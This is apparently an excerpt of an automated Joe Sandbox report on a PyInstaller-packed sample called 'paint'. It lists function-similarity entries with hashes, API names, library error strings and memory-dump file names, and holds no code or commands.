                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaa00000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007B6570
                                                                                                                                                                                                                                                                • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                                                • API String ID: 4069847057-87138338
                                                                                                                                                                                                                                                                • Opcode ID: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
                                                                                                                                                                                                                                                                • Instruction ID: 19807aefcaa87a4cd8dd7b5ed9b30235b88938365bfdf15966af87aa85576471
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2661E832B1875146E7A88E15A420A7A7652FB94790F48C275EA7D476CCEF7CD80FC700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                                • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                                • Instruction ID: 9ac106860b6b787191b920a5d593524cb2c303b69bb5fbe3892b9a9ea95b391a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D51A432B1A642AADB158B15D444638B7A2EB45B98F904134DAAF877C4FF3EE841C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                                                • Opcode ID: 02b7fb8bc51e8dee6a810458a6e483e8ad1e80f49c70391c8c568b9bf0be5385
                                                                                                                                                                                                                                                                • Instruction ID: 7b4321c4f40710311e50d71b194808f020aa6e24b2cc718d05bcfcb39a8f8536
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02b7fb8bc51e8dee6a810458a6e483e8ad1e80f49c70391c8c568b9bf0be5385
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6551ED73B09BC185CB10CF09E4A4AAEBB65F759B84F55803AEA9E037A9DB3CD545C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                                                • API String ID: 4225454184-2410398255
                                                                                                                                                                                                                                                                • Opcode ID: 3637a19043f084d588f66de9b4ccfa5c358998dffeaae2edb35b3df82807b365
                                                                                                                                                                                                                                                                • Instruction ID: 2369decd21c361be4d38f7962e6fc42d33bbcc98957083eac6d5f1190754abfd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3637a19043f084d588f66de9b4ccfa5c358998dffeaae2edb35b3df82807b365
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87610666B0969382E7109B26D16067D6760FF42B98F104032EF6D47BEDDF3CE411A710
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                                • Instruction ID: f59d71ac9fe0191e497b64ae552422e79337b99eb5124e347d249ac0d90cd728
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E351E532A0D38396EB708F219044369B7A2FB56B9AF944135DA6E877C5EF3DE450CB00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                                • Instruction ID: 9394beb1f63151598161e6eac3594eec2bd9f431080c80af28607362a8daae02
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9261B232A0DBC1D1DB609B15E4403AAB7A1FB86784F444235EBAD57B95EF7DD180CB00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: (join-%u)$(subquery-%u)
                                                                                                                                                                                                                                                                • API String ID: 4225454184-2916047017
                                                                                                                                                                                                                                                                • Opcode ID: 49fff31b694db0a63015b8c7494567ef428984a6d1a14628475fa2fe61a8c8d4
                                                                                                                                                                                                                                                                • Instruction ID: 61061186e96f46b65631e3dd3f2c2d60da6c15fe6b92db26c2963e78b6cf8d02
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49fff31b694db0a63015b8c7494567ef428984a6d1a14628475fa2fe61a8c8d4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C751D772B1A74389EB608E15D066F3923A6FB16BA4F554632D93D072ECEF2CE441E740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: $%!.15g$-
                                                                                                                                                                                                                                                                • API String ID: 4225454184-875264902
                                                                                                                                                                                                                                                                • Opcode ID: 44e7bfd73146257976c8babe6df8ad74685d0057028d93717c232ee9119ed487
                                                                                                                                                                                                                                                                • Instruction ID: d49eab07cb7645c3d5142722280bbafd74eb6147b87961cb453bf2177352cf7d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44e7bfd73146257976c8babe6df8ad74685d0057028d93717c232ee9119ed487
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A41F972F1978686E710CB2DE061BAA7BA0EB967C4F004125EA9D077AACB3DD115D700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2016607190.00007FFE00761000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016576633.00007FFE00760000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE007E3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE0080D000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE00818000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE00823000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016859124.00007FFE00827000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016893620.00007FFE00829000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffe00760000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007
                                                                                                                                                                                                                                                                • String ID: ..\s\ssl\tls_srp.c
                                                                                                                                                                                                                                                                • API String ID: 3568877910-1778748169
                                                                                                                                                                                                                                                                • Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                                                • Instruction ID: 8b6517fbce4d300748b82099fa9ab081dd25f3e367956e5cb44124db3375aba6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A411221A0BA8384FE54BF59955077822A1BF82F84F1D4536EF5D4B7AEDF3CA8128310
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,?,00007FF6F0BD352C,?,00000000,00007FF6F0BD3F23), ref: 00007FF6F0BD7F22
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                                • Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                                                                • Instruction ID: 1adcb07dcad7d3e3814122e2ec0d445c8667ee6a73cf12a533492772514a52df
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3631C92161AAC265EB318710A4507EAA355EF85BE4F840231EA7E877C9FE3DD5018700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                                                • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                                • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                                • Instruction ID: c399f70295f292b7a3f56ff47f6c04ec31914b0aee136e82ca984e476719bc4e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9921E272B09B81A2E7109B54F4447EA73A5FB89784F800132EE8E93796EF3DD245C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                                • Instruction ID: 0cbb36abafdf50650cd2a646155c75b64e2594921c9e3c62a75212670793cb35
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61D13172B18A859AE710CF64D4442AC37B1FB46798B809276DE6ED7BC9EE39D407C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4225454184-0
                                                                                                                                                                                                                                                                • Opcode ID: c805bd562258d8df5866e84e3d87bde111353fec1875c4e7c43f0334e34767cb
                                                                                                                                                                                                                                                                • Instruction ID: 7ece7618923dce0f2495141dceadfcb463ad2fb1c7dd2e64c41a806294124932
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c805bd562258d8df5866e84e3d87bde111353fec1875c4e7c43f0334e34767cb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A91BE72B0B7478AEB649A12D560A693398FB46BD0F485734EE7D0B7E9DE3CE4109700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F0BECFBB), ref: 00007FF6F0BED0EC
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F0BECFBB), ref: 00007FF6F0BED177
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                                • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                                • Instruction ID: 414f2d05418fb9737e174909a2bf75e93a5527519b2aea8965243ee4d6b7e42a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A291D232F18652A5F7508F6594402BD2BA0BF46B88F944179DE2FA7BC5EE7ED442C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
